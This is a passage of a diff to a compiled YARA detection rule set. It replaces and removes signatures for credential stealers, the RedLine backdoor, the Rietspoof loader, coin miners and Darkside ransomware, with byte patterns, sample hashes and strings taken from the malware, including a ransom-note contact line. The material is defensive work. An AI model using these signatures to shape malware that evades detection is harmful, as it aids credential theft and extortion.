"crypto.aes.AESUtils" fullword ascii - $s19 = "2. Send us a mail with proofs of transaction: VovanAndLexus@cock.li" fullword ascii - $s20 = "crypto.aes" fullword ascii - $op0 = { 48 8d 8d 10 ff ff ff e8 4a 22 fe ff f7 df 89 bd } - $op1 = { e8 60 6e fb ff 34 01 75 d6 4c 8b 46 40 48 8b 56 } - $op2 = { 4c 8d 85 40 ff ff ff 4c 8d 15 d2 78 02 00 4c 89 } + $jat = { 3C 3C 2F 41 75 74 68 6F 72 28 4A 41 54 29 20 2F 43 72 65 61 74 6F 72 28 } + $jatboss = { 3C 3C 2F 41 75 74 68 6F 72 28 4A 41 54 29 20 2F 43 72 65 61 74 6F 72 28 } + $spam = { 54 00 68 00 69 00 73 00 20 00 65 00 2D 00 6D 00 61 00 69 00 6C 00 20 00 61 00 6E 00 64 00 20 00 61 00 6E 00 79 00 20 00 61 00 74 00 74 00 61 00 63 00 68 00 6D 00 65 00 6E 00 74 00 20 00 61 00 72 00 65 00 20 00 43 00 6F 00 6E 00 66 00 69 00 64 00 65 00 6E 00 74 00 69 00 61 00 6C 00 2E 00 } condition: - ( uint16(0)==0x5a4d and filesize <17000KB and (1 of ($x*) and 4 of them ) and all of ($op*)) or ( all of them ) + ( uint16(0)==0x5025 and filesize <1000KB and ($jat or $jatboss)) or ( uint16(0)==0xcfd0 and $spam and any of ($jat*)) } -rule TRELLIX_ARC_STEALER_Credstealesy : STEALER +rule TRELLIX_ARC_Redline_Payload : BACKDOOR FILE { meta: - description = "Generic Rule to detect the CredStealer Malware" - author = "IsecG – McAfee Labs" - id = "90e23ed8-3243-519b-8eb4-9db5902c73d3" - date = "2015-05-08" + description = "Rule to detect the RedLine payload" + author = "Marc Rivero | McAfee ATR Team" + id = "61c2032f-1e6b-5123-8f99-ff83ae95e8a9" + date = "2020-04-16" modified = "2020-08-14" - reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/when-hackers-get-hacked-the-malware-servers-of-a-data-stealing-campaign/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/stealer/STEALER_credstealer.yar#L1-L24" + reference = "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_redline.yar#L1-L38" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "3d007fc0d2e2eb3d8f0c2b86dd01ede482e72f6c67fd6d284d77c47b53021b3c" + hash = "5df956f08d6ad0559efcdb7b7a59b2f3b95dee9e2aa6b76602c46e2aba855eff" + logic_hash = "44df161b7434b9137ca5bb919eb314f8447b216b3f6e1214606a898fb36ee4f4" score = 75 quality = 70 - tags = "STEALER" + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "stealer" - malware_family = "Stealer:W32/CredStealer" + malware_type = "backdoor" + malware_family = "Backdoor:W32/RedLine" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $my_hex_string = "CurrentControlSet\\Control\\Keyboard Layouts\\" wide - $my_hex_string2 = {89 45 E8 3B 7D E8 7C 0F 8B 45 E8 05 FF 00 00 00 2B C7 89 45 E8} + $s1 = "Cambrel.exe" fullword ascii + $s2 = { 22 00 54 00 65 00 78 00 74 00 49 00 6e 00 70 00 75 00 74 00 46 00 72 00 61 00 6d 00 65 00 77 00 6f 00 72 00 6b 00 2e 00 44 00 59 00 4e 00 4c 00 49 00 4e 00 4b 00 22 00 } + $op0 = { 06 7c 34 00 00 04 7b 17 00 00 04 7e 21 00 00 0a } + $op1 = { 96 00 92 0e 83 02 02 00 f4 20 } + $op2 = { 03 00 c6 01 d9 08 1b 03 44 } + $p0 = { 80 00 96 20 83 11 b7 02 10 } + $p1 = { 20 01 00 72 0f 00 20 02 00 8a 0f 00 20 03 00 61 } + $p2 = { 03 00 c6 01 cd 06 13 03 79 } condition: - $my_hex_string and $my_hex_string2 + uint16(0)==0x5a4d and filesize <60KB and all of ($s*) and all of ($op*) or all of ($p*) } -rule TRELLIX_ARC_STEALER_Emirates_Statement : STEALER +rule TRELLIX_ARC_Rietspoof_Loader : RANSOMWARE FILE { meta: - description = "Credentials Stealing Attack" - author = "Christiaan Beek | McAfee ATR Team" - id = "b5a6d996-8a3d-5238-95af-bf5ff893bbc5" - date = "2013-06-30" + description = "Rule to detect the Rietspoof loader" + author = "Marc Rivero | McAfee ATR Team" + id = "f306e381-e2ae-528e-937b-aced72356d77" + date = "2024-09-01" modified = "2020-08-14" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/stealer/STEALER_EmiratesStatement.yar#L1-L24" + reference = "https://blog.avast.com/rietspoof-malware-increases-activity" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_rietspoof_loader.yar#L1-L22" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "7cf757e0943b0a6598795156c156cb90feb7d87d4a22c01044499c4e1619ac57" - logic_hash = "17eaddf375fc1875fb0275f8c0f93dfe921b452bdc6eb471adc155f749492328" + logic_hash = "d72b58ff452070e03d0b25bc433ef5c677df77dd440adc1ecdb592cee24235fb" score = 75 - quality = 45 - tags = "STEALER" - rule_version = "v1" - malware_type = "stealer" - malware_family = "Stealer:W32/DarkSide" + quality = 70 + tags = "RANSOMWARE, FILE" + malware_type = "ransomware" + malware_family = "Loader:W32/Rietspoof" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $string0 = "msn.klm" - $string1 = "wmsn.klm" - $string2 = "bms.klm" + $x1 = "\\Work\\d2Od7s43\\techloader\\loader" fullword ascii condition: - all of them + uint16(0)==0x5a4d and all of them } -rule TRELLIX_ARC_STEALER_Lokibot : STEALER FILE +import "pe" + +rule TRELLIX_ARC_Trojan_Coinminer : FILE { meta: - description = "Rule to detect Lokibot stealer" - author = "Marc Rivero | McAfee ATR Team" - id = "75f502a3-2d9f-5ccf-93f8-2d6a73e9e1b7" - date = "2020-09-23" - modified = "2020-09-25" + description = "Rule to detect Coinminer malware" + author = "Trellix ATR" + id = "ec1f4fb7-bce3-5d5b-bbff-50f9bfc90298" + date = "2021-07-22" + modified = "2022-01-19" reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/stealer/STEALER_Lokibot.yar#L1-L39" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/miners/Trojan_CoinMiner.yar#L3-L23" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "999a69394a545f726cf15e4361e0dfc17eeac6544e6816a0ad140316e9642510" + logic_hash = "0d9d502eb0a54f90044f42f8ce485a2df6814064172cb7bf006a8c8a51976acd" score = 75 quality = 70 - tags = "STEALER, FILE" - rule_version = "v1" - malware_type = "stealer" - malware_family = "Ransomware:W32/Lokibot" - actor_type = "Cybercrime" - actor_group = "Unknown" - hash1 = "0e40f4fdd77e1f90279c585cfc787942b8474e5216ff4d324d952ef6b74f25d2" - hash2 = "3ad36afad12d8cf245904285c21a8db43f9ed9c82304fdc2f27c4dd1438e4a1d" - hash3 = "26fbdd516b3c1bfa36784ef35d6bc216baeb0ef2d0c0ba036ff9296da2ce2c84" + tags = "FILE" + version = "v1" + hash1 = "3bdac08131ba5138bcb5abaf781d6dc7421272ce926bc37fa27ca3eeddcec3c2" + hash2 = "d60766c4e6e77de0818e59f687810f54a4e08505561a6bcc93c4180adb0f67e7" strings: - $sq1 = { 55 8B EC 56 8B 75 08 57 56 E8 ?? ?? ?? ?? 8B F8 59 85 FF 75 04 33 C0 EB 20 56 6A 00 57 E8 ?? ?? ?? ?? 6A 0C E8 ?? ?? ?? ?? 83 C4 10 85 C0 74 E5 83 60 08 00 89 38 89 70 04 5F 5E 5D C3 } - $sq2 = { 55 8B EC 83 EC 0C 53 56 57 33 DB BE ?? ?? ?? ?? 53 53 56 6A 09 E8 ?? ?? ?? ?? 6A 10 6A 01 53 53 8D 4D F8 51 FF D0 53 53 56 6A 09 E8 ?? ?? ?? ?? 6A 08 6A 01 53 53 8D 4D F8 51 FF D0 85 C0 0F 84 2B 01 00 00 6A 24 E8 ?? ?? ?? ?? 59 8B D8 33 C0 6A 09 59 8B FB F3 AB 66 8B 4D 24 B8 03 66 00 00 C7 03 08 02 00 00 66 85 C9 74 03 0F B7 C1 8B 4D 08 33 D2 0F B7 C0 89 43 04 89 53 08 85 C9 74 12 C7 43 08 08 00 00 00 8B 01 89 43 0C 8B 41 04 89 43 10 8B 4D 0C 85 C9 74 0F 83 43 08 08 8B 01 89 43 14 8B 41 04 89 43 18 8B 4D 10 85 C9 74 0F 83 43 08 08 8B 01 89 43 1C 8B 41 04 89 43 20 8B 7B 08 8B 75 F8 83 C7 0C 52 52 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 8D 4D FC 51 6A 00 6A 00 57 53 56 FF D0 85 C0 74 75 8B 75 FC 33 C0 40 83 7D 20 00 0F 45 45 20 33 FF 57 57 68 ?? ?? ?? ?? 6A 09 89 45 F4 E8 ?? ?? ?? ?? 57 8D 4D F4 51 6A 04 56 FF D0 85 C0 74 3B 39 7D 14 74 1A 8B 75 FC 57 57 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 57 FF 75 14 6A 01 56 FF D0 8B 55 18 8B 4D FC 53 89 0A 8B 55 1C 8B 4D F8 89 0A E8 ?? ?? ?? ?? 33 C0 59 40 EB 21 FF 75 FC E8 BF FB FF FF 59 EB 02 33 FF 53 E8 ?? ?? ?? ?? 57 FF 75 F8 E8 6B FB FF FF 83 C4 0C 33 C0 5F 5E 5B 8B E5 5D C3 } - $sq3 = { 55 8B EC 83 EC 0C 53 8B 5D 0C 56 57 6A 10 33 F6 89 75 F8 89 75 FC 58 89 45 F4 85 DB 75 0E FF 75 08 E8 ?? ?? ?? ?? 8B D8 8B 45 F4 59 50 E8 ?? ?? ?? ?? 8B F8 59 85 FF 0F 84 B6 00 00 00 FF 75 F4 56 57 E8 C4 ?? ?? ?? 83 C4 0C 56 56 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 68 00 00 00 F0 6A 01 56 56 8D 4D F8 51 FF D0 85 C0 0F 84 84 00 00 00 8B 75 F8 6A 00 6A 00 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 8D 4D FC 51 6A 00 6A 00 68 03 80 00 00 56 FF D0 85 C0 74 51 6A 00 53 FF 75 08 FF 75 FC E8 7F FD FF FF 83 C4 10 85 C0 74 3C 8B 75 FC 6A 00 6A 00 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 6A 00 8D 4D F4 51 57 6A 02 56 FF D0 85 C0 74 19 FF 75 FC E8 16 FD FF FF 6A 00 FF 75 F8 E8 26 FD FF FF 83 C4 0C 8B C7 EB 0E 6A 00 FF 75 F8 E8 15 FD FF FF 59 59 33 C0 5F 5E 5B 8B E5 5D C3 } - $sq4 = { 55 8B EC 83 7D 10 00 56 57 8B 7D 0C 57 74 0E E8 ?? ?? ?? ?? 8B F0 33 C0 03 F6 40 EB 09 E8 ?? ?? ?? ?? 8B F0 33 C0 83 7D 14 00 59 75 24 50 FF 75 08 E8 2C 00 00 00 59 59 83 F8 01 74 04 33 C0 EB 1D 56 FF 75 08 E8 C5 FE FF FF 59 59 83 F8 01 75 EC 56 57 FF 75 08 E8 CA FE FF FF 83 C4 0C 5F 5E 5D C3 } - $sq5 = { 55 8B EC 53 56 8B 75 0C 57 85 F6 75 0B FF 75 08 E8 ?? ?? ?? ?? 59 8B F0 6B C6 03 89 45 0C 8D 58 01 53 E8 ?? ?? ?? ?? 8B F8 59 85 FF 74 42 53 6A 00 57 E8 ?? ?? ?? ?? 83 C4 0C 33 D2 85 F6 74 27 8B 45 08 0F B6 0C 02 8B C1 83 E1 0F C1 E8 04 8A 80 ?? ?? ?? ?? 88 04 57 8A 81 ?? ?? ?? ?? 88 44 57 01 42 3B D6 72 D9 8B 45 0C C6 04 07 00 8B C7 5F 5E 5B 5D C3 } - $sq6 = { 55 8B EC 53 56 57 FF 75 08 E8 ?? ?? ?? ?? 33 C9 6A 02 5B 8D B8 A0 1F 00 00 8B C7 F7 E3 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 74 6F 8D 0C 3F 51 6A 00 56 E8 ?? ?? ?? ?? 8D 45 0C 50 FF 75 08 56 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 83 C4 1C 85 FF 74 40 33 C9 8D 47 02 F7 E3 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B D8 59 85 DB 74 25 8D 0C 7D 02 00 00 00 51 6A 00 53 E8 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 1C 8B C3 EB 09 56 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5B 5D C3 } - $sq7 = { 55 8B EC 81 EC 80 00 00 00 56 57 E8 ?? ?? ?? ?? 6A 1F 59 BE ?? ?? ?? ?? 8D 7D 80 F3 A5 33 C9 6A 02 5A 66 A5 8B 7D 08 8D 47 01 F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B F0 59 85 F6 74 4D 8D 04 7D 02 00 00 00 4F 89 45 08 53 50 6A 00 56 E8 ?? ?? ?? ?? 83 C4 0C 33 DB 85 FF 74 1C E8 ?? ?? ?? ?? 33 D2 6A 7E 59 F7 F1 D1 EA 66 8B 44 55 80 66 89 04 5E 43 3B DF 72 E4 56 E8 ?? ?? ?? ?? 3B F8 8B 45 08 59 77 C4 8B C6 5B EB 02 33 C0 5F 5E 8B E5 5D C3 } - $sq8 = { 55 8B EC 81 EC 50 02 00 00 53 56 57 6A 0A E8 ?? ?? ?? ?? 59 33 DB 6A 2E 5E 39 5D 14 0F 84 13 01 00 00 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 0F 84 F7 00 00 00 53 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 56 FF D0 8B D8 83 FB FF 0F 84 CC 00 00 00 F6 85 B0 FD FF FF 10 0F 84 97 00 00 00 83 7D 1C 00 74 2E 8D 85 DC FD FF FF 68 ?? ?? ?? ?? 50 E8 0A ?? ?? ?? 59 59 85 C0 75 7A 8D 85 DC FD FF FF 68 ?? ?? ?? ?? 50 E8 F3 ?? ?? ?? 59 59 85 C0 75 63 8D 85 DC FD FF FF 50 E8 ?? ?? ?? ?? 59 83 F8 03 73 0C 6A 2E 58 66 39 85 DC FD FF FF 74 45 8D 85 DC FD FF FF 50 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 0C 89 45 14 85 C0 74 27 6A 01 6A 00 6A 01 FF 75 10 FF 75 0C 50 E8 14 FF FF FF FF 75 14 8B F8 E8 ?? ?? ?? ?? 83 C4 1C 85 FF 0F 85 EE 00 00 00 33 C0 50 50 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 53 FF D0 85 C0 0F 85 3B FF FF FF 53 E8 ?? ?? ?? ?? 59 56 E8 ?? ?? ?? ?? 59 33 DB 6A 2E 5E FF 75 0C FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 0C 85 FF 0F 84 CF 00 00 00 53 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 57 FF D0 8B D8 83 FB FF 0F 84 A6 00 00 00 8D 85 DC FD FF FF 50 E8 ?? ?? ?? ?? 59 83 F8 03 73 09 66 39 B5 DC FD FF FF 74 3E 83 BD B0 FD FF FF 10 75 06 83 7D 18 00 74 2F 8D 85 DC FD FF FF 50 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 0C 85 F6 74 12 83 7D 10 00 74 40 56 FF 55 10 56 E8 ?? ?? ?? ?? 59 59 33 C0 50 50 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 53 FF D0 85 C0 74 29 6A 2E 5E EB 85 56 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8B C7 EB 22 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8B C6 EB 10 53 E8 ?? ?? ?? ?? 59 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5B 8B E5 5D C3 } - $sq9 = { 83 3D 14 ?? ?? ?? ?? 56 74 0A 8B 35 20 ?? ?? ?? 85 F6 75 66 53 57 BB E0 01 00 00 33 FF 53 89 3D 14 ?? ?? ?? E8 F0 F8 FF FF 33 F6 A3 14 ?? ?? ?? 46 59 85 C0 74 12 6A 78 57 50 89 35 20 ?? ?? ?? E8 A6 F8 FF FF 83 C4 0C 53 89 3D 18 ?? ?? ?? E8 C5 F8 FF FF A3 18 ?? ?? ?? 59 85 C0 74 14 6A 78 57 50 89 35 20 ?? ?? ?? E8 7E F8 FF FF 83 C4 0C EB 06 8B 35 20 ?? ?? ?? 5F 5B 8B C6 5E C3 } - $sq10 = { 55 8B EC 51 51 83 65 FC 00 53 56 57 64 A1 30 00 00 00 89 45 FC 8B 45 FC 8B 40 0C 8B 58 0C 8B F3 8B 46 18 FF 76 28 89 45 F8 E8 CE FA FF FF 8B F8 59 85 FF 74 1F 6A 00 57 E8 32 01 00 00 57 E8 ?? ?? ?? ?? 03 C0 50 57 E8 71 FA FF FF 83 C4 14 39 45 08 74 11 8B 36 3B DE 75 C6 33 C0 5F 5E 5B 8B E5 5D C2 04 00 8B 45 F8 EB F2 } - $sq11 = { A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 33 C0 A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? C3 } - $sq12 = { 55 8B EC 56 8B 75 0C 57 85 F6 74 48 56 E8 ?? ?? ?? ?? 59 85 C0 74 3D 56 E8 ?? ?? ?? ?? 59 85 C0 74 32 83 65 0C 00 8D 45 0C 6A 01 50 56 E8 ?? ?? ?? ?? 8B F8 83 C4 0C 85 FF 74 19 8B 45 0C 85 C0 74 12 83 7D 14 00 74 12 39 45 14 73 0D 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5D C3 83 7D 10 00 74 1A 6A 00 6A 01 56 E8 ?? ?? ?? ?? 59 50 FF 75 08 E8 1F 00 00 00 8B 45 0C 83 C4 10 50 57 FF 75 08 E8 FF FE FF FF 57 8B F0 E8 ?? ?? ?? ?? 83 C4 10 8B C6 EB C3 } - $sq13 = { 55 8B EC 83 EC 18 56 FF 75 08 E8 ?? ?? ?? ?? 50 89 45 F0 E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 0F 84 C0 00 00 00 53 8B 5D 0C 33 C9 57 6A 04 5A 8B C3 F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 65 F4 00 8B F8 83 65 FC 00 59 85 DB 74 6D 8B 45 10 83 C0 FC FF 75 F0 83 C0 04 89 45 E8 6A 00 56 8B 00 89 45 EC E8 ?? ?? ?? ?? FF 75 F0 FF 75 08 56 E8 ?? ?? ?? ?? 83 65 F8 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 20 EB 1F FF 75 EC 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 32 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 45 F8 59 59 85 C0 75 DD 8B 45 FC 40 89 45 FC 3B C3 8B 45 E8 72 99 56 E8 ?? ?? ?? ?? 59 39 5D F4 75 12 8B C7 EB 17 8B 45 FC 8B 4D F8 FF 45 F4 89 0C 87 EB D7 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5B 5E 8B E5 5D C3 } - $sq14 = { 55 8B EC 8B 45 0C 53 56 8B 75 08 57 8B 4E 04 03 C1 8D 3C 09 3B F8 77 06 8D B8 F4 01 00 00 33 C9 8B C7 6A 04 5A F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B D8 59 85 DB 74 26 57 6A 00 53 E8 ?? ?? ?? ?? FF 76 08 FF 36 53 E8 ?? ?? ?? ?? FF 36 E8 ?? ?? ?? ?? 33 C0 89 1E 83 C4 1C 89 7E 04 40 5F 5E 5B 5D C3 } - $sq15 = { 55 8B EC 83 7D 0C 00 57 74 39 8B 7D 10 85 FF 74 32 56 8B 75 08 8B 46 08 03 C7 3B 46 04 76 09 57 56 E8 3F FF FF FF 59 59 8B 46 08 03 06 57 FF 75 0C 50 E8 ?? ?? ?? ?? 01 7E 08 83 C4 0C 33 C0 40 5E EB 02 33 C0 5F 5D C3 } + $seq0 = { df 75 ab 7b 80 bf 83 c1 48 b3 18 74 70 01 24 5c } + $seq1 = { 08 37 4e 6e 0f 50 0b 11 d0 98 0f a8 b8 27 47 4e } + $seq2 = { bf 17 5a 08 09 ab 80 2f a1 b0 b1 da 47 9f e1 61 } + $seq3 = { 53 36 34 b2 94 01 cc 05 8c 36 aa 8a 07 ff 06 1f } + $seq4 = { 25 30 ae c4 44 d1 97 82 a5 06 05 63 07 02 28 3a } + $seq5 = { 01 69 8e 1c 39 7b 11 56 38 0f 43 c8 5f a8 62 d0 } condition: - uint16(0)==0x5a4d and any of them + ( uint16(0)==0x5a4d and filesize <5000KB and pe.imphash()=="e4290fa6afc89d56616f34ebbd0b1f2c" and 3 of ($seq*)) } rule TRELLIX_ARC_MINER_Monero_Mining_Detection : MINER FILE { @@ -193404,43 +195304,11 @@ rule TRELLIX_ARC_MINER_Monero_Mining_Detection : MINER FILE condition: ( uint16(0)==0x5a4d and filesize <4000KB and (8 of them )) or ( all of them ) } -import "pe" - -rule TRELLIX_ARC_Trojan_Coinminer : FILE -{ - meta: - description = "Rule to detect Coinminer malware" - author = "Trellix ATR" - id = "ec1f4fb7-bce3-5d5b-bbff-50f9bfc90298" - date = "2021-07-22" - modified = "2022-01-19" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/miners/Trojan_CoinMiner.yar#L3-L23" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "0d9d502eb0a54f90044f42f8ce485a2df6814064172cb7bf006a8c8a51976acd" - score = 75 - quality = 70 - tags = "FILE" - version = "v1" - hash1 = "3bdac08131ba5138bcb5abaf781d6dc7421272ce926bc37fa27ca3eeddcec3c2" - hash2 = "d60766c4e6e77de0818e59f687810f54a4e08505561a6bcc93c4180adb0f67e7" - - strings: - $seq0 = { df 75 ab 7b 80 bf 83 c1 48 b3 18 74 70 01 24 5c } - $seq1 = { 08 37 4e 6e 0f 50 0b 11 d0 98 0f a8 b8 27 47 4e } - $seq2 = { bf 17 5a 08 09 ab 80 2f a1 b0 b1 da 47 9f e1 61 } - $seq3 = { 53 36 34 b2 94 01 cc 05 8c 36 aa 8a 07 ff 06 1f } - $seq4 = { 25 30 ae c4 44 d1 97 82 a5 06 05 63 07 02 28 3a } - $seq5 = { 01 69 8e 1c 39 7b 11 56 38 0f 43 c8 5f a8 62 d0 } - - condition: - ( uint16(0)==0x5a4d and filesize <5000KB and pe.imphash()=="e4290fa6afc89d56616f34ebbd0b1f2c" and 3 of ($seq*)) -} /* * YARA Rule Set * Repository Name: Arkbird SOLG * Repository: https://github.com/StrangerealIntel/DailyIOC - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: a873ff1298c43705e9c67286f3014f4300dd04f7 * Number of Rules: 214 * Skipped: 0 (age), 10 (quality), 0 (score), 0 (importance) @@ -193450,77 +195318,6 @@ rule TRELLIX_ARC_Trojan_Coinminer : FILE * * NO LICENSE SET */ -rule ARKBIRD_SOLG_RAN_ELF_Darkside_Apr_2021_1 : FILE -{ - meta: - description = "Detect the ELF version of Darkside ransomware" - author = "Arkbird_SOLG" - id = "10c0ba57-d6d6-5d1d-bd2a-f6f240d71f8b" - date = "2021-05-01" - modified = "2021-05-02" - reference = "https://twitter.com/JAMESWT_MHT/status/1388301138437578757" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-01/Darkside/RAN_ELF_Darkside_Apr_2021_1.yara#L1-L23" - license_url = "N/A" - logic_hash = "510932893e1e81d6c88e86c7ae2345460b397c936336c7e1a33799dbc1dd6aab" - score = 75 - quality = 75 - tags = "FILE" - hash1 = "984ce69083f2865ce90b48569291982e786980aeef83345953276adfcbbeece8" - hash2 = "9cc3c217e3790f3247a0c0d3d18d6917701571a8526159e942d0fffb848acffb" - hash3 = "c93e6237abf041bc2530ccb510dd016ef1cc6847d43bf023351dce2a96fdc33b" - tlp = "White" - adversary = "-" - - strings: - $seq1 = { 48 8d 3d d1 e8 3b 00 e8 9c 51 f2 ff 85 c0 74 c6 4c 8d 6c 24 10 4c 89 ef e8 ab bf 02 00 48 8d 1d 34 bb 37 00 49 8d 75 08 48 8d 3d 31 e1 3b 00 48 8d 43 10 48 89 05 1e e1 3b 00 e8 09 1e 02 00 48 8d 05 22 d8 0e 00 48 8b 7c 24 18 c7 05 4b e1 3b 00 01 00 00 00 48 89 05 1c e1 3b 00 48 8d 05 4d d8 0e 00 48 85 ff 48 89 05 13 e1 3b 00 48 8d 05 84 d8 0e 00 48 89 05 0d e1 3b 00 48 8d 05 be d8 0e 00 48 89 05 07 e1 3b 00 48 8d 05 48 d9 0e 00 48 89 05 01 e1 3b 00 48 8d 43 10 48 89 44 24 10 74 05 e8 21 45 f2 ff 4c 8d ac 24 30 03 00 00 4c 89 ef e8 11 bf 02 00 4c 8d b4 24 10 03 00 00 ba 03 00 00 00 4c 89 ee 4c 89 f7 e8 39 62 ff ff 48 8b bc 24 38 03 00 00 48 8d 43 10 48 89 84 24 30 03 00 00 48 85 ff 74 05 e8 db 44 f2 ff 4c 8d 6c 24 30 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 06 62 ff ff 48 8b bc 24 18 03 00 00 48 8d 43 10 48 89 84 24 10 03 00 00 48 85 ff 74 05 e8 a8 44 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 81 e0 3b 00 48 89 05 72 e0 3b 00 e8 0d 1d 02 00 48 8d 05 26 d7 0e 00 48 8b 7c 24 38 c7 05 9f e0 3b 00 01 00 00 00 48 89 05 70 e0 3b 00 48 8d 05 51 d7 0e 00 48 85 ff 48 89 05 67 e0 3b 00 48 8d 05 88 d7 0e 00 48 89 05 61 e0 3b 00 48 8d 05 c2 d7 0e 00 48 89 05 5b e0 3b 00 48 8d 05 4c d8 0e 00 48 89 05 55 e0 3b 00 48 8d 43 10 48 89 44 24 30 74 05 e8 25 44 f2 ff 4c 8d b4 24 50 03 00 00 4c 89 f7 e8 05 c5 02 00 4c 8d 6c 24 50 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 40 61 ff ff 48 8b bc 24 58 03 00 00 48 8d 43 10 48 89 84 24 50 03 00 00 48 85 ff 74 05 e8 e2 43 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 0b e0 3b 00 48 89 05 fc df 3b 00 e8 47 1c 02 00 48 8d 05 18 d8 0e 00 48 8b 7c 24 58 c7 05 29 e0 3b 00 01 00 00 00 48 89 05 fa df 3b 00 48 8d 05 33 d8 0e 00 48 85 ff 48 89 05 f1 df 3b 00 48 8d 05 5a d8 0e 00 48 89 05 eb df 3b 00 48 8d 05 84 d8 0e 00 48 89 05 e5 df 3b 00 48 8d 05 de d8 0e 00 48 89 05 df df 3b 00 48 8d 43 10 48 89 44 24 50 74 05 e8 5f 43 f2 ff 4c 8d b4 24 70 03 00 00 4c 89 f7 e8 3f c4 02 00 4c 8d 6c 24 70 ba 07 00 00 00 4c 89 f6 4c 89 ef e8 7a 60 ff ff 48 8b bc 24 78 03 00 00 48 8d 43 10 48 89 84 24 70 03 00 00 48 85 ff 74 05 e8 1c 43 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 95 df 3b 00 48 89 05 86 df 3b 00 e8 81 1b 02 00 48 8d 05 9a d8 0e 00 48 8b 7c 24 78 c7 05 b3 df 3b 00 01 00 00 00 48 89 05 84 df 3b 00 48 8d 05 c5 d8 0e 00 48 85 ff 48 89 05 7b df 3b 00 48 8d 05 fc d8 0e 00 48 89 05 75 df 3b 00 48 8d 05 36 d9 0e 00 48 89 05 6f df 3b 00 48 8d 05 b0 d9 0e 00 48 89 05 69 df 3b 00 48 8d 43 10 48 89 44 24 70 74 05 e8 99 42 f2 ff 4c 8d ac 24 90 03 00 00 4c 89 ef e8 19 be 02 00 4c 8d b4 24 b0 